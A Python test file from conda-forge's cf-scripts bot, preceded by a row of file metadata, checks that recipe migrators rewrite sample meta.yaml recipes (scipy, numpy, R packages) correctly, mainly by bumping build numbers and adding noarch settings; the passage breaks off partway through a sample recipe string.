| 46.723077 | 120 | 0.590056 | 6,773 | 54,666 | 4.702348 | 0.085634 | 0.015542 | 0.023297 | 0.03099 | 0.826996 | 0.799554 | 0.791642 | 0.779083 | 0.769538 | 0.767654 | 0 | 0.018793 | 0.303059 | 54,666 | 1,169 | 121 | 46.763045 | 0.817161 | 0.148941 | 0 | 0.72267 | 0 | 0.036824 | 0.38467 | 0.00217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06214 | false | 0 | 0.008055 | 0.003452 | 0.254315 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0ef6f158195c53eba54fe33351b907d3c9bbc378 | 45,322 | py | Python | tests/test_migrators.py | JorgeGarciaIrazabal/cf-scripts | 69f4f0268496281c2b9e2073e13566b985b06677 | [
"MIT"
] | null | null | null | tests/test_migrators.py | JorgeGarciaIrazabal/cf-scripts | 69f4f0268496281c2b9e2073e13566b985b06677 | [
"MIT"
] | 24 | 2020-11-03T01:33:39.000Z | 2022-01-02T12:34:16.000Z | tests/test_migrators.py | bgruening/cf-scripts | bca57b85be7c9b85a180210f74c90be293519371 | [
"MIT"
] | null | null | null | import os
import builtins
import re
import pytest
import networkx as nx
from conda_forge_tick.contexts import MigratorSessionContext, MigratorContext
from conda_forge_tick.migrators import (
Version,
MigrationYaml,
Replacement,
)
# Legacy THINGS
from conda_forge_tick.migrators.disabled.legacy import (
JS,
Compiler,
Noarch,
Pinning,
NoarchR,
BlasRebuild,
Rebuild,
)
from conda_forge_tick.utils import (
parse_meta_yaml,
frozen_to_json_friendly,
)
from conda_forge_tick.feedstock_parser import populate_feedstock_attributes
from xonsh.lib import subprocess
from xonsh.lib.os import indir
sample_yaml_rebuild = """
{% set version = "1.3.2" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: ac0937d29a3f93cc26737fdf318c09408e9a48adee1648a25d0cdce5647b8eb4
patches:
- gh10591.patch
- relax_gmres_error_check.patch # [aarch64]
- skip_problematic_boost_test.patch # [aarch64 or ppc64le]
- skip_problematic_root_finding.patch # [aarch64 or ppc64le]
- skip_TestIDCTIVFloat_aarch64.patch # [aarch64]
- skip_white_tophat03.patch # [aarch64 or ppc64le]
# remove this patch when updating to 1.3.3
{% if version == "1.3.2" %}
- scipy-1.3.2-bad-tests.patch # [osx and py == 38]
- gh11046.patch # [ppc64le]
{% endif %}
build:
number: 0
skip: true # [win or py2k]
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- libblas
- libcblas
- liblapack
- python
- setuptools
- cython
- numpy
- pip
run:
- python
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- pytest-xdist
- mpmath
{% if version == "1.3.2" %}
- blas * netlib # [ppc64le]
{% endif %}
about:
home: http://www.scipy.org/
license: BSD-3-Clause
license_file: LICENSE.txt
summary: Scientific Library for Python
description: |
SciPy is a Python-based ecosystem of open-source software for mathematics,
science, and engineering.
doc_url: http://www.scipy.org/docs.html
dev_url: https://github.com/scipy/scipy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- rgommers
- ocefpaf
- beckermr
"""
updated_yaml_rebuild = """
{% set version = "1.3.2" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: ac0937d29a3f93cc26737fdf318c09408e9a48adee1648a25d0cdce5647b8eb4
patches:
- gh10591.patch
- relax_gmres_error_check.patch # [aarch64]
- skip_problematic_boost_test.patch # [aarch64 or ppc64le]
- skip_problematic_root_finding.patch # [aarch64 or ppc64le]
- skip_TestIDCTIVFloat_aarch64.patch # [aarch64]
- skip_white_tophat03.patch # [aarch64 or ppc64le]
# remove this patch when updating to 1.3.3
{% if version == "1.3.2" %}
- scipy-1.3.2-bad-tests.patch # [osx and py == 38]
- gh11046.patch # [ppc64le]
{% endif %}
build:
number: 1
skip: true # [win or py2k]
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- libblas
- libcblas
- liblapack
- python
- setuptools
- cython
- numpy
- pip
run:
- python
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- pytest-xdist
- mpmath
{% if version == "1.3.2" %}
- blas * netlib # [ppc64le]
{% endif %}
about:
home: http://www.scipy.org/
license: BSD-3-Clause
license_file: LICENSE.txt
summary: Scientific Library for Python
description: |
SciPy is a Python-based ecosystem of open-source software for mathematics,
science, and engineering.
doc_url: http://www.scipy.org/docs.html
dev_url: https://github.com/scipy/scipy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- rgommers
- ocefpaf
- beckermr
"""
updated_yaml_rebuild_no_build_number = """
{% set version = "1.3.2" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: ac0937d29a3f93cc26737fdf318c09408e9a48adee1648a25d0cdce5647b8eb4
patches:
- gh10591.patch
- relax_gmres_error_check.patch # [aarch64]
- skip_problematic_boost_test.patch # [aarch64 or ppc64le]
- skip_problematic_root_finding.patch # [aarch64 or ppc64le]
- skip_TestIDCTIVFloat_aarch64.patch # [aarch64]
- skip_white_tophat03.patch # [aarch64 or ppc64le]
# remove this patch when updating to 1.3.3
{% if version == "1.3.2" %}
- scipy-1.3.2-bad-tests.patch # [osx and py == 38]
- gh11046.patch # [ppc64le]
{% endif %}
build:
number: 0
skip: true # [win or py2k]
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- libblas
- libcblas
- liblapack
- python
- setuptools
- cython
- numpy
- pip
run:
- python
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- pytest-xdist
- mpmath
{% if version == "1.3.2" %}
- blas * netlib # [ppc64le]
{% endif %}
about:
home: http://www.scipy.org/
license: BSD-3-Clause
license_file: LICENSE.txt
summary: Scientific Library for Python
description: |
SciPy is a Python-based ecosystem of open-source software for mathematics,
science, and engineering.
doc_url: http://www.scipy.org/docs.html
dev_url: https://github.com/scipy/scipy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- rgommers
- ocefpaf
- beckermr
"""
class NoFilter:
    """Mixin that disables migrator filtering: every feedstock passes."""

    def filter(self, attrs, not_bad_str_start=""):
        """Never filter anything out; unconditionally returns False."""
        return False
class _MigrationYaml(NoFilter, MigrationYaml):
    # MigrationYaml with filtering disabled, so the tests exercise the
    # migration machinery itself rather than the filtering logic.
    pass
# Module-level migrator fixtures: the default one bumps the build number,
# while the bump_number=0 variant must leave the recipe's number unchanged.
yaml_rebuild = _MigrationYaml(yaml_contents="hello world", name="hi")
yaml_rebuild.cycles = []
yaml_rebuild_no_build_number = _MigrationYaml(
    yaml_contents="hello world",
    name="hi",
    bump_number=0,
)
yaml_rebuild_no_build_number.cycles = []
def run_test_yaml_migration(
    m, *, inp, output, kwargs, prb, mr_out, tmpdir, should_filter=False
):
    """
    Drive a yaml-based migrator end-to-end against a recipe on disk.

    Writes ``inp`` as the recipe's meta.yaml, builds the node attributes the
    bot's graph would normally supply, runs the migrator, and asserts that
    the rewritten recipe matches ``output`` and that the migration yaml was
    saved under ``.ci_support/migrations/``. (``prb`` is currently unused.)
    """
    recipe_dir = os.path.join(tmpdir, "recipe")
    os.makedirs(recipe_dir, exist_ok=True)
    with open(os.path.join(recipe_dir, "meta.yaml"), "w") as fp:
        fp.write(inp)

    # The migrator expects to operate inside a git repository.
    with indir(tmpdir):
        subprocess.run(["git", "init"])

    # Load the meta.yaml (this is done in the graph normally).
    try:
        attrs = parse_meta_yaml(inp)
    except Exception:
        attrs = {}

    if attrs:
        attrs["version"] = attrs["package"]["version"]
        attrs["req"] = set()
        for section in ["build", "host", "run"]:
            attrs["req"] |= set(attrs.get("requirements", {}).get(section, set()))
        try:
            attrs["meta_yaml"] = parse_meta_yaml(inp)
        except Exception:
            attrs["meta_yaml"] = {}
    attrs["raw_meta_yaml"] = inp
    attrs.update(kwargs)

    assert m.filter(attrs) is should_filter
    if should_filter:
        return

    mr = m.migrate(recipe_dir, attrs)
    assert mr_out == mr
    attrs.update(PRed=[frozen_to_json_friendly(mr)])

    # The recipe on disk must now match the expected output exactly.
    with open(os.path.join(recipe_dir, "meta.yaml")) as fp:
        assert fp.read() == output

    # The migration yaml itself must have been persisted verbatim.
    migration_yaml = os.path.join(tmpdir, ".ci_support/migrations/hi.yaml")
    assert os.path.exists(migration_yaml)
    with open(migration_yaml) as fp:
        assert fp.read() == m.yaml_contents
def test_yaml_migration_rebuild(tmpdir):
    # The default yaml migrator bumps the build number (0 -> 1).
    run_test_yaml_migration(
        m=yaml_rebuild,
        inp=sample_yaml_rebuild,
        output=updated_yaml_rebuild,
        kwargs={"feedstock_name": "scipy"},
        prb="This PR has been triggered in an effort to update **hi**.",
        mr_out={
            "migrator_name": yaml_rebuild.__class__.__name__,
            "migrator_version": yaml_rebuild.migrator_version,
            "name": "hi",
            "bot_rerun": False,
        },
        tmpdir=tmpdir,
    )
def test_yaml_migration_rebuild_no_buildno(tmpdir):
    # With bump_number=0, the recipe's build number must stay untouched.
    run_test_yaml_migration(
        m=yaml_rebuild_no_build_number,
        inp=sample_yaml_rebuild,
        output=updated_yaml_rebuild_no_build_number,
        kwargs={"feedstock_name": "scipy"},
        prb="This PR has been triggered in an effort to update **hi**.",
        mr_out={
            # Reference the migrator actually under test. This previously
            # pointed at `yaml_rebuild`; the values coincide today (both are
            # _MigrationYaml instances), but the cross-reference was fragile
            # and misleading.
            "migrator_name": yaml_rebuild_no_build_number.__class__.__name__,
            "migrator_version": yaml_rebuild_no_build_number.migrator_version,
            "name": "hi",
            "bot_rerun": False,
        },
        tmpdir=tmpdir,
    )
sample_js = """{% set name = "jstz" %}
{% set version = "1.0.11" %}
{% set sha256 = "985d5fd8705930aab9cc59046e99c1f512d05109c9098039f880df5f5df2bf24" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
url: https://github.com/iansinnott/{{ name }}/archive/v{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 0
noarch: generic
script: npm install -g .
requirements:
build:
- nodejs
test:
commands:
- npm list -g jstz
requires:
- nodejs
about:
home: https://github.com/iansinnott/jstz
license: MIT
license_family: MIT
license_file: LICENCE
summary: 'Timezone detection for JavaScript'
description: |
This library allows you to detect a user's timezone from within their browser.
It is often useful to use JSTZ in combination with a timezone parsing library
such as Moment Timezone.
doc_url: http://pellepim.bitbucket.org/jstz/
dev_url: https://github.com/iansinnott/jstz
extra:
recipe-maintainers:
- cshaley
- sannykr"""
sample_js2 = """{% set name = "jstz" %}
{% set version = "1.0.11" %}
{% set sha256 = "985d5fd8705930aab9cc59046e99c1f512d05109c9098039f880df5f5df2bf24" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
url: https://github.com/iansinnott/{{ name }}/archive/v{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 0
noarch: generic
script: |
tgz=$(npm pack)
npm install -g $tgz
requirements:
build:
- nodejs
test:
commands:
- npm list -g jstz
requires:
- nodejs
about:
home: https://github.com/iansinnott/jstz
license: MIT
license_family: MIT
license_file: LICENCE
summary: 'Timezone detection for JavaScript'
description: |
This library allows you to detect a user's timezone from within their browser.
It is often useful to use JSTZ in combination with a timezone parsing library
such as Moment Timezone.
doc_url: http://pellepim.bitbucket.org/jstz/
dev_url: https://github.com/iansinnott/jstz
extra:
recipe-maintainers:
- cshaley
- sannykr"""
correct_js = """{% set name = "jstz" %}
{% set version = "1.0.11" %}
{% set sha256 = "985d5fd8705930aab9cc59046e99c1f512d05109c9098039f880df5f5df2bf24" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
url: https://github.com/iansinnott/{{ name }}/archive/v{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 1
noarch: generic
script: |
tgz=$(npm pack)
npm install -g $tgz
requirements:
build:
- nodejs
test:
commands:
- npm list -g jstz
requires:
- nodejs
about:
home: https://github.com/iansinnott/jstz
license: MIT
license_family: MIT
license_file: LICENCE
summary: 'Timezone detection for JavaScript'
description: |
This library allows you to detect a user's timezone from within their browser.
It is often useful to use JSTZ in combination with a timezone parsing library
such as Moment Timezone.
doc_url: http://pellepim.bitbucket.org/jstz/
dev_url: https://github.com/iansinnott/jstz
extra:
recipe-maintainers:
- cshaley
- sannykr
"""
sample_cb3 = """
{# sample_cb3 #}
{% set version = "1.14.5" %}
{% set build_number = 0 %}
{% set variant = "openblas" %}
{% set build_number = build_number + 200 %}
package:
name: numpy
version: {{ version }}
source:
url: https://github.com/numpy/numpy/releases/download/v{{ version }}/numpy-{{ version }}.tar.gz
sha256: 1b4a02758fb68a65ea986d808867f1d6383219c234aef553a8741818e795b529
build:
number: {{ build_number }}
skip: true # [win32 or (win and py27)]
features:
- blas_{{ variant }}
requirements:
build:
- python
- pip
- cython
- toolchain
- blas 1.1 {{ variant }}
- openblas 0.2.20|0.2.20.*
run:
- python
- blas 1.1 {{ variant }}
- openblas 0.2.20|0.2.20.*
test:
requires:
- nose
commands:
- f2py -h
- conda inspect linkages -p $PREFIX $PKG_NAME # [not win]
- conda inspect objects -p $PREFIX $PKG_NAME # [osx]
imports:
- numpy
- numpy.linalg.lapack_lite
about:
home: http://numpy.scipy.org/
license: BSD 3-Clause
license_file: LICENSE.txt
summary: 'Array processing for numbers, strings, records, and objects.'
doc_url: https://docs.scipy.org/doc/numpy/reference/
dev_url: https://github.com/numpy/numpy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- pelson
- rgommers
- ocefpaf
""" # noqa
correct_cb3 = """
{# correct_cb3 #}
{% set version = "1.14.5" %}
{% set build_number = 1 %}
{% set variant = "openblas" %}
{% set build_number = build_number + 200 %}
package:
name: numpy
version: {{ version }}
source:
url: https://github.com/numpy/numpy/releases/download/v{{ version }}/numpy-{{ version }}.tar.gz
sha256: 1b4a02758fb68a65ea986d808867f1d6383219c234aef553a8741818e795b529
build:
number: {{ build_number }}
skip: true # [win32 or (win and py27)]
features:
- blas_{{ variant }}
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- python
- pip
- cython
- blas 1.1 {{ variant }}
- openblas
run:
- python
- blas 1.1 {{ variant }}
- openblas
test:
requires:
- nose
commands:
- f2py -h
- conda inspect linkages -p $PREFIX $PKG_NAME # [not win]
- conda inspect objects -p $PREFIX $PKG_NAME # [osx]
imports:
- numpy
- numpy.linalg.lapack_lite
about:
home: http://numpy.scipy.org/
license: BSD 3-Clause
license_file: LICENSE.txt
summary: 'Array processing for numbers, strings, records, and objects.'
doc_url: https://docs.scipy.org/doc/numpy/reference/
dev_url: https://github.com/numpy/numpy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- pelson
- rgommers
- ocefpaf
""" # noqa
sample_r_base = """
{# sample_r_base #}
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 1
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
""" # noqa
updated_r_base = """
{# updated_r_base #}
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
noarch: generic
number: 2
rpaths:
- lib/R/lib/
- lib/
requirements:
build:
- r-base
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
""" # noqa
sample_r_base2 = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 1
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
- {{ compiler('c') }}
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
""" # noqa
updated_r_base2 = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 2
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
- {{ compiler('c') }}
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
""" # noqa
# Test that filepaths to various licenses are updated for a noarch recipe
sample_r_licenses_noarch = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 1
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
about:
license_family: GPL3
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-3' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\GPL-3' # [win]
license_family: MIT
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/MIT' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\MIT' # [win]
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\LGPL-2' # [win]
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2.1' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\LGPL-2.1' # [win]
license_family: BSD
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\BSD_3_clause' # [win]
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-2' # [unix]
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause' # [unix]
""" # noqa
updated_r_licenses_noarch = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
noarch: generic
number: 2
rpaths:
- lib/R/lib/
- lib/
requirements:
build:
- r-base
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
about:
license_family: GPL3
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-3'
license_family: MIT
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/MIT'
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2'
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2.1'
license_family: BSD
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause'
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-2'
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause'
""" # noqa
# Test that filepaths to various licenses are updated for a compiled recipe
sample_r_licenses_compiled = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 1
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
- {{ compiler('c') }}
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
about:
license_family: GPL3
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-3' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\GPL-3' # [win]
license_family: MIT
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/MIT' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\MIT' # [win]
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\LGPL-2' # [win]
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2.1' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\LGPL-2.1' # [win]
license_family: BSD
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\BSD_3_clause' # [win]
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-2' # [unix]
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause' # [unix]
""" # noqa
updated_r_licenses_compiled = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 2
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
- {{ compiler('c') }}
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
about:
license_family: GPL3
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-3'
license_family: MIT
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/MIT'
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2'
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2.1'
license_family: BSD
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause'
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-2'
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause'
""" # noqa
sample_noarch = """
{# sample_noarch #}
{% set name = "xpdan" %}
{% set version = "0.3.3" %}
{% set sha256 = "3f1a84f35471aa8e383da3cf4436492d0428da8ff5b02e11074ff65d400dd076" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
fn: {{ name }}-{{ version }}.tar.gz
url: https://github.com/xpdAcq/{{ name }}/releases/download/{{ version }}/{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 0
script: python -m pip install --no-deps --ignore-installed .
requirements:
build:
- python >=3
- pip
run:
- python >=3
- numpy
- scipy
- matplotlib
- pyyaml
- scikit-beam
- pyfai
- pyxdameraulevenshtein
- xray-vision
- databroker
- bluesky
- streamz_ext
- xpdsim
- shed
- xpdview
- ophyd
- xpdconf
test:
imports:
- xpdan
- xpdan.pipelines
about:
home: http://github.com/xpdAcq/xpdAn
license: BSD-3-Clause
license_family: BSD
license_file: LICENSE
summary: 'Analysis Tools for XPD'
doc_url: http://xpdacq.github.io/xpdAn/
dev_url: http://github.com/xpdAcq/xpdAn
extra:
recipe-maintainers:
- CJ-Wright
""" # noqa
updated_noarch = """
{# updated_noarch #}
{% set name = "xpdan" %}
{% set version = "0.3.3" %}
{% set sha256 = "3f1a84f35471aa8e383da3cf4436492d0428da8ff5b02e11074ff65d400dd076" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
fn: {{ name }}-{{ version }}.tar.gz
url: https://github.com/xpdAcq/{{ name }}/releases/download/{{ version }}/{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
noarch: python
number: 1
script: python -m pip install --no-deps --ignore-installed .
requirements:
host:
- python >=3
- pip
run:
- python >=3
- numpy
- scipy
- matplotlib
- pyyaml
- scikit-beam
- pyfai
- pyxdameraulevenshtein
- xray-vision
- databroker
- bluesky
- streamz_ext
- xpdsim
- shed
- xpdview
- ophyd
- xpdconf
test:
imports:
- xpdan
- xpdan.pipelines
about:
home: http://github.com/xpdAcq/xpdAn
license: BSD-3-Clause
license_family: BSD
license_file: LICENSE
summary: 'Analysis Tools for XPD'
doc_url: http://xpdacq.github.io/xpdAn/
dev_url: http://github.com/xpdAcq/xpdAn
extra:
recipe-maintainers:
- CJ-Wright
""" # noqa
sample_noarch_space = """
{# sample_noarch_space #}
{% set name = "xpdan" %}
{% set version = "0.3.3" %}
{% set sha256 = "3f1a84f35471aa8e383da3cf4436492d0428da8ff5b02e11074ff65d400dd076" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
fn: {{ name }}-{{ version }}.tar.gz
url: https://github.com/xpdAcq/{{ name }}/releases/download/{{ version }}/{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 0
script: python -m pip install --no-deps --ignore-installed .
requirements:
build:
- python >=3
- pip
run:
- python >=3
- numpy
- scipy
- matplotlib
- pyyaml
- scikit-beam
- pyfai
- pyxdameraulevenshtein
- xray-vision
- databroker
- bluesky
- streamz_ext
- xpdsim
- shed
- xpdview
- ophyd
- xpdconf
test:
imports:
- xpdan
- xpdan.pipelines
about:
home: http://github.com/xpdAcq/xpdAn
license: BSD-3-Clause
license_family: BSD
license_file: LICENSE
summary: 'Analysis Tools for XPD'
doc_url: http://xpdacq.github.io/xpdAn/
dev_url: http://github.com/xpdAcq/xpdAn
extra:
recipe-maintainers:
- CJ-Wright
""" # noqa
updated_noarch_space = """
{# updated_noarch_space #}
{% set name = "xpdan" %}
{% set version = "0.3.3" %}
{% set sha256 = "3f1a84f35471aa8e383da3cf4436492d0428da8ff5b02e11074ff65d400dd076" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
fn: {{ name }}-{{ version }}.tar.gz
url: https://github.com/xpdAcq/{{ name }}/releases/download/{{ version }}/{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
noarch: python
number: 1
script: python -m pip install --no-deps --ignore-installed .
requirements:
host:
- python >=3
- pip
run:
- python >=3
- numpy
- scipy
- matplotlib
- pyyaml
- scikit-beam
- pyfai
- pyxdameraulevenshtein
- xray-vision
- databroker
- bluesky
- streamz_ext
- xpdsim
- shed
- xpdview
- ophyd
- xpdconf
test:
imports:
- xpdan
- xpdan.pipelines
about:
home: http://github.com/xpdAcq/xpdAn
license: BSD-3-Clause
license_family: BSD
license_file: LICENSE
summary: 'Analysis Tools for XPD'
doc_url: http://xpdacq.github.io/xpdAn/
dev_url: http://github.com/xpdAcq/xpdAn
extra:
recipe-maintainers:
- CJ-Wright
""" # noqa
sample_pinning = """
{# sample_pinning #}
{% set version = "2.44_01" %}
package:
name: perl-xml-parser
version: {{ version }}
source:
fn: XML-Parser-{{ version }}.tar.gz
url: https://cpan.metacpan.org/authors/id/T/TO/TODDR/XML-Parser-{{ version }}.tar.gz
